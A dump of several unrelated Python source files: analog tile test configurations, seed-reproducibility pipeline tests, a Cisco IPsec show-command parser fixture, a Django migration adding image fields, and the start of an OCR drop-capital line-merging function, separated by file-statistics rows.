use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class ExpStep:
"""AnalogTile with ExpStepDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound'
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=ExpStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Vector:
"""AnalogTile with VectorUnitCell."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound_0'
use_cuda = False
def get_rpu_config(self):
return UnitCellRPUConfig(device=VectorUnitCell(
unit_cell_devices=[
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0),
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Reference:
"""AnalogTile with ReferenceUnitCell."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound_0'
use_cuda = False
def get_rpu_config(self):
return UnitCellRPUConfig(device=ReferenceUnitCell(
unit_cell_devices=[
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0),
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Difference:
"""AnalogTile with DifferenceUnitCell."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound_0'
use_cuda = False
def get_rpu_config(self):
return UnitCellRPUConfig(device=DifferenceUnitCell(
unit_cell_devices=[
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Transfer:
"""AnalogTile with TransferCompound."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound_0'
use_cuda = False
def get_rpu_config(self):
return UnitCellRPUConfig(device=TransferCompound(
unit_cell_devices=[
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0),
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0)
],
transfer_forward=IOParameters(is_perfect=True),
transfer_every=1,
gamma=0.1
))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Inference:
"""Inference tile."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = None
use_cuda = False
def get_rpu_config(self):
return InferenceRPUConfig()
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return InferenceTile(out_size, in_size, rpu_config, **kwargs)
class FloatingPointCuda:
"""FloatingPointTile."""
simulator_tile_class = getattr(tiles, 'CudaFloatingPointTile', None)
first_hidden_field = None
use_cuda = True
def get_rpu_config(self):
return FloatingPointRPUConfig()
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return FloatingPointTile(out_size, in_size, rpu_config, **kwargs).cuda()
class IdealCuda:
"""AnalogTile with IdealDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = None
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=IdealDevice())
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class ConstantStepCuda:
"""AnalogTile with ConstantStepDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound'
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=ConstantStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class LinearStepCuda:
"""AnalogTile with LinearStepDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound'
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=LinearStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class SoftBoundsCuda:
"""AnalogTile with SoftBoundsDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound'
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class ExpStepCuda:
"""AnalogTile with ExpStepDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound'
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=ExpStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class VectorCuda:
"""AnalogTile with VectorUnitCell."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound_0'
use_cuda = True
def get_rpu_config(self):
return UnitCellRPUConfig(device=VectorUnitCell(
unit_cell_devices=[
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0),
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class ReferenceCuda:
"""AnalogTile with ReferenceUnitCell."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound_0'
use_cuda = True
def get_rpu_config(self):
return UnitCellRPUConfig(device=ReferenceUnitCell(
unit_cell_devices=[
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0),
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class DifferenceCuda:
"""AnalogTile with DifferenceUnitCell."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound_0'
use_cuda = True
def get_rpu_config(self):
return UnitCellRPUConfig(device=DifferenceUnitCell(
unit_cell_devices=[
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class TransferCuda:
"""AnalogTile with TransferUnitCell."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound_0'
use_cuda = True
def get_rpu_config(self):
return UnitCellRPUConfig(device=TransferCompound(
unit_cell_devices=[
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0),
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0)
],
transfer_forward=IOParameters(is_perfect=True),
transfer_every=1,
gamma=0.1
))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class InferenceCuda:
"""Inference tile."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = None
use_cuda = True
def get_rpu_config(self):
return InferenceRPUConfig()
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return InferenceTile(out_size, in_size, rpu_config, **kwargs).cuda()
| 31.761671
| 85
| 0.696913
| 1,649
| 12,927
| 5.141298
| 0.094603
| 0.140127
| 0.062279
| 0.067469
| 0.851852
| 0.845247
| 0.789809
| 0.789809
| 0.788158
| 0.787096
| 0
| 0.00654
| 0.207473
| 12,927
| 406
| 86
| 31.839901
| 0.820986
| 0.095846
| 0
| 0.8125
| 0
| 0
| 0.027763
| 0.001816
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171875
| false
| 0
| 0.015625
| 0.085938
| 0.703125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
9265ef31bbba9dc6d911e8e58102e67e90f1654c
| 2,707
|
py
|
Python
|
src/tests/test_random.py
|
Shashvatb/pythia
|
07fb178940a0f3cefd1d9126bdf974005a88b70c
|
[
"Apache-2.0"
] | 84
|
2016-06-01T23:53:50.000Z
|
2021-12-15T03:57:19.000Z
|
src/tests/test_random.py
|
Shashvatb/pythia
|
07fb178940a0f3cefd1d9126bdf974005a88b70c
|
[
"Apache-2.0"
] | 79
|
2016-06-02T01:18:39.000Z
|
2016-10-01T00:32:12.000Z
|
src/tests/test_random.py
|
Shashvatb/pythia
|
07fb178940a0f3cefd1d9126bdf974005a88b70c
|
[
"Apache-2.0"
] | 29
|
2016-05-31T17:44:31.000Z
|
2021-06-01T11:06:13.000Z
|
import numpy as np
from src.pipelines.master_pipeline import get_args, main as pipeline_main
from src.utils.sampling import label_sample
def test_random():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=True,
LDA_APPEND=True,
BOW_APPEND=True,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1==run2
def test_random_logreg():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=False,
LOG_REG=True,
LDA_APPEND=False,
BOW_APPEND=True,
W2V_APPEND=False,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1==run2
def test_random_xgboost():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=True,
LDA_APPEND=False,
BOW_APPEND=True,
W2V_APPEND=False,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1==run2
def test_random_svm():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=False,
SVM=True,
LDA_APPEND=False,
BOW_APPEND=True,
W2V_APPEND=False,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1 == run2
def test_random_lda():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=False,
LOG_REG=True,
LDA_APPEND=True,
BOW_APPEND=False,
W2V_APPEND=False,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1 == run2
def test_random_resampling():
data = [ { 'key': True, 'data': 123 },
{ 'key': True, 'data': 123 },
{ 'key': True, 'data': 123 },
{ 'key': True, 'data': 123 },
{ 'key': True, 'data': 123 },
{ 'key': False, 'data': 123 },
{ 'key': False, 'data': 123 },
]
def get_state(seed):
return np.random.RandomState(seed)
sampled_data = label_sample(data, 'key', random_state=get_state(41))
sampled_data2 = label_sample(data, 'key', random_state=get_state(41))
assert sampled_data == sampled_data2
| 33.419753
| 73
| 0.515331
| 281
| 2,707
| 4.761566
| 0.170819
| 0.098655
| 0.119581
| 0.056054
| 0.800448
| 0.800448
| 0.760837
| 0.760837
| 0.760837
| 0.702541
| 0
| 0.036659
| 0.385297
| 2,707
| 80
| 74
| 33.8375
| 0.767428
| 0
| 0
| 0.756757
| 0
| 0
| 0.064647
| 0.04433
| 0
| 0
| 0
| 0
| 0.081081
| 1
| 0.094595
| false
| 0
| 0.040541
| 0.013514
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a66be4fb1e9849e030ea7c221f4e56315c9c89c9
| 9,889
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowCryptoIpsecSaDetail/cli/equal/golden_output_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowCryptoIpsecSaDetail/cli/equal/golden_output_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowCryptoIpsecSaDetail/cli/equal/golden_output_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
expected_output={
"interface":{
"GigabitEthernet3":{
"crypto_map_tag":"vpn-crypto-map",
"ident":{
1:{
"acl":"origin_is_acl,",
"action":"PERMIT",
"current_outbound_spi":"0x397C36EE(964441838)",
"dh_group":"none",
"inbound_ah_sas":{
},
"inbound_esp_sas":{
"spi":{
"0x658F7C11(1703902225)":{
"conn_id":2076,
"crypto_map":"vpn-crypto-map",
"flow_id":"CSR",
"flow_id_val":76,
"transform":"esp-256-aes esp-sha256-hmac",
"in_use_settings":"Tunnel, ",
"iv_size":"16 bytes",
"remaining_key_lifetime":"(4607999/83143)",
"replay_detection_support":"Y",
"sibling_flags":"FFFFFFFF80000048",
"status":"ACTIVE(ACTIVE)"
}
}
},
"inbound_pcp_sas":{
},
"ip_mtu_idb":"GigabitEthernet3",
"local_crypto_endpt":"1.1.1.2",
"local_ident":{
"addr":"20.20.20.0",
"mask":"255.255.255.0",
"port":"0",
"prot":"0"
},
"outbound_ah_sas":{
},
"outbound_esp_sas":{
"spi":{
"0x397C36EE(964441838)":{
"conn_id":2075,
"crypto_map":"vpn-crypto-map",
"flow_id":"CSR",
"flow_id_val":75,
"transform":"esp-256-aes esp-sha256-hmac",
"in_use_settings":"Tunnel, ",
"iv_size":"16 bytes",
"remaining_key_lifetime":"(4607999/83143)",
"replay_detection_support":"Y",
"sibling_flags":"FFFFFFFF80000048",
"status":"ACTIVE(ACTIVE)"
}
}
},
"outbound_pcp_sas":{
},
"path_mtu":1500,
"peer_ip":"1.1.1.1",
"pfs":"N",
"pkts_compr_failed":0,
"pkts_compressed":0,
"pkts_decaps":4,
"pkts_decompress_failed":0,
"pkts_decompressed":0,
"pkts_decrypt":4,
"pkts_internal_err_recv":0,
"pkts_internal_err_send":0,
"pkts_invalid_identity_recv":0,
"pkts_invalid_prot_recv":0,
"pkts_invalid_sa_rcv":0,
"pkts_no_sa_send":0,
"pkts_not_compressed":0,
"pkts_not_decompressed":0,
"pkts_not_tagged_send":0,
"pkts_not_untagged_rcv":0,
"pkts_replay_failed_rcv":0,
"pkts_replay_rollover_rcv":0,
"pkts_replay_rollover_send":0,
"pkts_tagged_send":0,
"pkts_untagged_rcv":0,
"pkts_verify":4,
"pkts_verify_failed":0,
"plaintext_mtu":1438,
"ip_mtu":1500,
"port":500,
"protected_vrf":"(none)",
"remote_crypto_endpt":"1.1.1.1",
"remote_ident":{
"addr":"10.10.10.0",
"mask":"255.255.255.0",
"port":"0",
"prot":"0"
}
},
2:{
"acl":"origin_is_acl,",
"action":"PERMIT",
"current_outbound_spi":"0x0(0)",
"dh_group":"none",
"inbound_ah_sas":{
},
"inbound_esp_sas":{
},
"inbound_pcp_sas":{
},
"ip_mtu_idb":"GigabitEthernet3",
"local_crypto_endpt":"1.1.1.2",
"local_ident":{
"addr":"40.40.40.0",
"mask":"255.255.255.0",
"port":"0",
"prot":"0"
},
"outbound_ah_sas":{
},
"outbound_esp_sas":{
},
"outbound_pcp_sas":{
},
"path_mtu":1500,
"peer_ip":"1.1.1.1",
"pfs":"N",
"pkts_compr_failed":0,
"pkts_compressed":0,
"pkts_decaps":0,
"pkts_decompress_failed":0,
"pkts_decompressed":0,
"pkts_decrypt":0,
"pkts_internal_err_recv":0,
"pkts_internal_err_send":0,
"pkts_invalid_identity_recv":0,
"pkts_invalid_prot_recv":0,
"pkts_invalid_sa_rcv":0,
"pkts_no_sa_send":0,
"pkts_not_compressed":0,
"pkts_not_decompressed":0,
"pkts_not_tagged_send":0,
"pkts_not_untagged_rcv":0,
"pkts_replay_failed_rcv":0,
"pkts_replay_rollover_rcv":0,
"pkts_replay_rollover_send":0,
"pkts_tagged_send":0,
"pkts_untagged_rcv":0,
"pkts_verify":0,
"pkts_verify_failed":0,
"plaintext_mtu":1500,
"port":500,
"ip_mtu":1500,
"protected_vrf":"(none)",
"remote_crypto_endpt":"1.1.1.1",
"remote_ident":{
"addr":"30.30.30.0",
"mask":"255.255.255.0",
"port":"0",
"prot":"0"
}
}
},
"local_addr":"1.1.1.2"
},
"Tunnel0":{
"crypto_map_tag":"Tunnel0-head-0",
"ident":{
1:{
"acl":"origin_is_acl,",
"action":"PERMIT",
"current_outbound_spi":"0x2E8482F8(780436216)",
"dh_group":"none",
"inbound_ah_sas":{
},
"inbound_esp_sas":{
"spi":{
"0xA54D38A4(2773301412)":{
"conn_id":2077,
"crypto_map":"Tunnel0-head-0",
"flow_id":"CSR",
"flow_id_val":77,
"transform":"esp-256-aes esp-sha256-hmac",
"in_use_settings":"Tunnel, ",
"iv_size":"16 bytes",
"remaining_key_lifetime":"(4608000/3189)",
"replay_detection_support":"Y",
"sibling_flags":"FFFFFFFF80004048",
"status":"ACTIVE(ACTIVE)"
}
}
},
"inbound_pcp_sas":{
},
"ip_mtu_idb":"GigabitEthernet5",
"local_crypto_endpt":"2.2.2.2",
"local_ident":{
"addr":"0.0.0.0",
"mask":"0.0.0.0",
"port":"0",
"prot":"0"
},
"outbound_ah_sas":{
},
"outbound_esp_sas":{
"spi":{
"0x2E8482F8(780436216)":{
"conn_id":2078,
"crypto_map":"Tunnel0-head-0",
"flow_id":"CSR",
"flow_id_val":78,
"transform":"esp-256-aes esp-sha256-hmac",
"in_use_settings":"Tunnel, ",
"iv_size":"16 bytes",
"remaining_key_lifetime":"(4608000/3189)",
"replay_detection_support":"Y",
"sibling_flags":"FFFFFFFF80004048",
"status":"ACTIVE(ACTIVE)"
}
}
},
"outbound_pcp_sas":{
},
"path_mtu":1500,
"peer_ip":"2.2.2.1",
"pfs":"N",
"pkts_compr_failed":0,
"pkts_compressed":0,
"pkts_decaps":0,
"pkts_decompress_failed":0,
"pkts_decompressed":0,
"pkts_decrypt":0,
"pkts_internal_err_recv":0,
"pkts_internal_err_send":0,
"pkts_invalid_identity_recv":0,
"pkts_invalid_prot_recv":0,
"pkts_invalid_sa_rcv":0,
"pkts_no_sa_send":0,
"pkts_not_compressed":0,
"pkts_not_decompressed":0,
"pkts_not_tagged_send":0,
"pkts_not_untagged_rcv":0,
"pkts_replay_failed_rcv":0,
"pkts_replay_rollover_rcv":0,
"pkts_replay_rollover_send":0,
"pkts_tagged_send":0,
"pkts_untagged_rcv":0,
"pkts_verify":0,
"pkts_verify_failed":0,
"plaintext_mtu":1438,
"port":500,
"ip_mtu":1500,
"protected_vrf":"(none)",
"remote_crypto_endpt":"2.2.2.1",
"remote_ident":{
"addr":"0.0.0.0",
"mask":"0.0.0.0",
"port":"0",
"prot":"0"
}
}
},
"local_addr":"2.2.2.2"
}
}
}
| 35.444444
| 67
| 0.375569
| 832
| 9,889
| 4.097356
| 0.157452
| 0.092402
| 0.039601
| 0.036961
| 0.895864
| 0.890877
| 0.890877
| 0.874743
| 0.874743
| 0.830742
| 0
| 0.100241
| 0.495601
| 9,889
| 279
| 68
| 35.444444
| 0.5832
| 0
| 0
| 0.709434
| 0
| 0
| 0.375531
| 0.100404
| 0
| 0
| 0.00637
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a66c1046b636a94aae26bc4aa2b8a88780124835
| 2,460
|
py
|
Python
|
real_estate_api/owner/migrations/0003_auto_20180804_1441.py
|
rossi1/RES
|
729196bfa45cc2b47acc93c49c07c7e8f0f6ea93
|
[
"MIT"
] | null | null | null |
real_estate_api/owner/migrations/0003_auto_20180804_1441.py
|
rossi1/RES
|
729196bfa45cc2b47acc93c49c07c7e8f0f6ea93
|
[
"MIT"
] | null | null | null |
real_estate_api/owner/migrations/0003_auto_20180804_1441.py
|
rossi1/RES
|
729196bfa45cc2b47acc93c49c07c7e8f0f6ea93
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0 on 2018-08-04 21:41
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('owner', '0002_auto_20180801_1657'),
]
operations = [
migrations.RemoveField(
model_name='propertylisting',
name='image',
),
migrations.AddField(
model_name='landlisting',
name='phone_five',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='landlisting',
name='phone_four',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='landlisting',
name='phone_three',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='landlisting',
name='phone_two',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='landlisting',
name='photo_one',
field=models.ImageField(default='', upload_to=''),
preserve_default=False,
),
migrations.AddField(
model_name='propertylisting',
name='phone_five',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='propertylisting',
name='phone_four',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='propertylisting',
name='phone_three',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='propertylisting',
name='phone_two',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='propertylisting',
name='photo_one',
field=models.ImageField(default='', upload_to=''),
preserve_default=False,
),
migrations.AddField(
model_name='propertylisting',
name='videolink',
field=django.contrib.postgres.fields.ArrayField(base_field=models.URLField(blank=True), default=[], size=None),
preserve_default=False,
),
]
| 31.948052
| 123
| 0.561382
| 219
| 2,460
| 6.127854
| 0.260274
| 0.080477
| 0.188525
| 0.221311
| 0.737705
| 0.737705
| 0.737705
| 0.709389
| 0.709389
| 0.709389
| 0
| 0.017836
| 0.31626
| 2,460
| 76
| 124
| 32.368421
| 0.780024
| 0.01748
| 0
| 0.828571
| 1
| 0
| 0.124224
| 0.009524
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a69e9f589478d3ff5b76b33a29c06e7f1c74ddfd
| 26,408
|
py
|
Python
|
qurator/eynollah/utils/drop_capitals.py
|
jacektl/eynollah
|
d784202ae177f975c648bb6885d5a126ec14b059
|
[
"Apache-2.0"
] | null | null | null |
qurator/eynollah/utils/drop_capitals.py
|
jacektl/eynollah
|
d784202ae177f975c648bb6885d5a126ec14b059
|
[
"Apache-2.0"
] | null | null | null |
qurator/eynollah/utils/drop_capitals.py
|
jacektl/eynollah
|
d784202ae177f975c648bb6885d5a126ec14b059
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import cv2
from .contour import (
find_new_features_of_contours,
return_contours_of_image,
return_parent_contours,
)
def adhere_drop_capital_region_into_corresponding_textline(
text_regions_p,
polygons_of_drop_capitals,
contours_only_text_parent,
contours_only_text_parent_h,
all_box_coord,
all_box_coord_h,
all_found_texline_polygons,
all_found_texline_polygons_h,
kernel=None,
curved_line=False,
):
# print(np.shape(all_found_texline_polygons),np.shape(all_found_texline_polygons[3]),'all_found_texline_polygonsshape')
# print(all_found_texline_polygons[3])
cx_m, cy_m, _, _, _, _, _ = find_new_features_of_contours(contours_only_text_parent)
cx_h, cy_h, _, _, _, _, _ = find_new_features_of_contours(contours_only_text_parent_h)
cx_d, cy_d, _, _, y_min_d, y_max_d, _ = find_new_features_of_contours(polygons_of_drop_capitals)
img_con_all = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
for j_cont in range(len(contours_only_text_parent)):
img_con_all[all_box_coord[j_cont][0] : all_box_coord[j_cont][1], all_box_coord[j_cont][2] : all_box_coord[j_cont][3], 0] = (j_cont + 1) * 3
# img_con_all=cv2.fillPoly(img_con_all,pts=[contours_only_text_parent[j_cont]],color=((j_cont+1)*3,(j_cont+1)*3,(j_cont+1)*3))
# plt.imshow(img_con_all[:,:,0])
# plt.show()
# img_con_all=cv2.dilate(img_con_all, kernel, iterations=3)
# plt.imshow(img_con_all[:,:,0])
# plt.show()
# print(np.unique(img_con_all[:,:,0]))
for i_drop in range(len(polygons_of_drop_capitals)):
# print(i_drop,'i_drop')
img_con_all_copy = np.copy(img_con_all)
img_con = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_con = cv2.fillPoly(img_con, pts=[polygons_of_drop_capitals[i_drop]], color=(1, 1, 1))
# plt.imshow(img_con[:,:,0])
# plt.show()
##img_con=cv2.dilate(img_con, kernel, iterations=30)
# plt.imshow(img_con[:,:,0])
# plt.show()
# print(np.unique(img_con[:,:,0]))
img_con_all_copy[:, :, 0] = img_con_all_copy[:, :, 0] + img_con[:, :, 0]
img_con_all_copy[:, :, 0][img_con_all_copy[:, :, 0] == 1] = 0
kherej_ghesmat = np.unique(img_con_all_copy[:, :, 0]) / 3
res_summed_pixels = np.unique(img_con_all_copy[:, :, 0]) % 3
region_with_intersected_drop = kherej_ghesmat[res_summed_pixels == 1]
# region_with_intersected_drop=region_with_intersected_drop/3
region_with_intersected_drop = region_with_intersected_drop.astype(np.uint8)
# print(len(region_with_intersected_drop),'region_with_intersected_drop1')
if len(region_with_intersected_drop) == 0:
img_con_all_copy = np.copy(img_con_all)
img_con = cv2.dilate(img_con, kernel, iterations=4)
img_con_all_copy[:, :, 0] = img_con_all_copy[:, :, 0] + img_con[:, :, 0]
img_con_all_copy[:, :, 0][img_con_all_copy[:, :, 0] == 1] = 0
kherej_ghesmat = np.unique(img_con_all_copy[:, :, 0]) / 3
res_summed_pixels = np.unique(img_con_all_copy[:, :, 0]) % 3
region_with_intersected_drop = kherej_ghesmat[res_summed_pixels == 1]
# region_with_intersected_drop=region_with_intersected_drop/3
region_with_intersected_drop = region_with_intersected_drop.astype(np.uint8)
# print(np.unique(img_con_all_copy[:,:,0]))
if curved_line:
if len(region_with_intersected_drop) > 1:
sum_pixels_of_intersection = []
for i in range(len(region_with_intersected_drop)):
# print((region_with_intersected_drop[i]*3+1))
sum_pixels_of_intersection.append(((img_con_all_copy[:, :, 0] == (region_with_intersected_drop[i] * 3 + 1)) * 1).sum())
# print(sum_pixels_of_intersection)
region_final = region_with_intersected_drop[np.argmax(sum_pixels_of_intersection)] - 1
# print(region_final,'region_final')
# cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
try:
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = np.array(cy_t) # all_box_coord[int(region_final)][0]+np.array(cy_t)
# print(y_lines)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 0] # +all_box_coord[int(region_final)][2]
cnt_nearest[:, 0, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 1] # +all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
